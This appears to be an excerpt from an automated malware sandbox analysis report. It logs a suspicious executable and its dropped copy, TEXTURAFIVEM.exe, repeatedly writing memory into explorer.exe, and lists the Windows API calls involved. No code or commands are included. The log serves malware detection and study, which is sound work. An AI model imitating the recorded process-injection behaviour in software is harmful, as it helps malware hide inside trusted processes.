            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3660000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3670000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3680000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3690000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B40000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B50000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B60000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B70000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B80000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B90000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3BF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3C20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5400000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5410000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5450000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5460000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5470000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5480000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5490000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5500000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5510000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5600000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5610000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5700000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5710000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5800000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5810000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5900000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5910000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5C00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5C10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5CF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5D00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5D10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5DF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5E00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5E10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5ED0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5EF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24080000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5F00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5F10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3370000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E20000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E30000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4ED0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5070000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5080000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5090000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5170000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5180000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5190000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5270000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5280000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5290000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5370000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5380000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5390000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5470000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5480000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5490000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe 1_2_0040B3C0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe 1_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe 4_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe 4_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe 5_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe 5_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe 9_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe 9_2_0040B7FC
